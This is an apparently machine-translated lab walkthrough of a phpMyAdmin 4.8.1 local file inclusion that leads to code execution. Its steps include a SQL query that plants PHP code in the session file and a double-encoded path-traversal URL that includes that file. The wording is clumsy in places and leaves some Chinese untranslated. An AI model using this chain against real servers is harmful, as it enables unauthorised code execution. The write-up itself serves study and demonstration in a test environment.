PhpMyAdmin 4.8.x local file contains exploit

PhpMyAdmin 4.8.x local file contains exploit

Today CHAMD5 Security team exposes a phpMyAdmin in the latest version of the local file contains vulnerability: phpmyadmin4.8.1 background Getshell. The exploit does not require a root account and can be exploited only by logging in to PhpMyAdmin.

In this article we will use Vulnspy's online phpMyAdmin environment to demonstrate the exploits of this vulnerability.

Vulnspy Online phpMyAdmin Environment address: HTTP://WWW.VULNSPY.COM/PHPMYADMIN-4.8.1/

Vulnerability Details

Refer to the article published by the CHAMD5 security team: phpmyadmin4.8.1 backstage Getshell

Exploit exploits

Because the original text 包含数据库文件 may not be available due to file permissions or insufficient account permissions, here we will use another way to use the file contains a vulnerability, that is, the session file.

1. Enter Vulnspy online phpMyAdmin environment address, click Start to Hack, jump to Vsplate

2. After waiting for the load setting, click the GO button to open the experiment

3. After the experiment is created, click on the demo address to enter the experiment

4. Use account root, password Toor login phpMyAdmin

5. Click the button in the top navigation bar SQL to execute the SQL query

select ‘<?php phpinfo();exit;?>‘

6. Get your session ID

Your SESSION ID is the item in the Cookie phpMyAdmin .

This corresponds to the session file /var/lib/php/sessions/sess_你的SESSION ID .

7. Include session file to successfully exploit this vulnerability

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

GitHub Source

https://github.com/vulnspy/phpmyadmin-4.8.1

Reference

"Starter" phpmyadmin4.8.1 backstage Getshell
PhpMyAdmin 4.8.x LFI to RCE (Authorization Required)-https://blog.vulnspy.com/2018/06/21/ phpmyadmin-4-8-x-authorited-cli-to-rce/

PhpMyAdmin 4.8.x local file contains exploit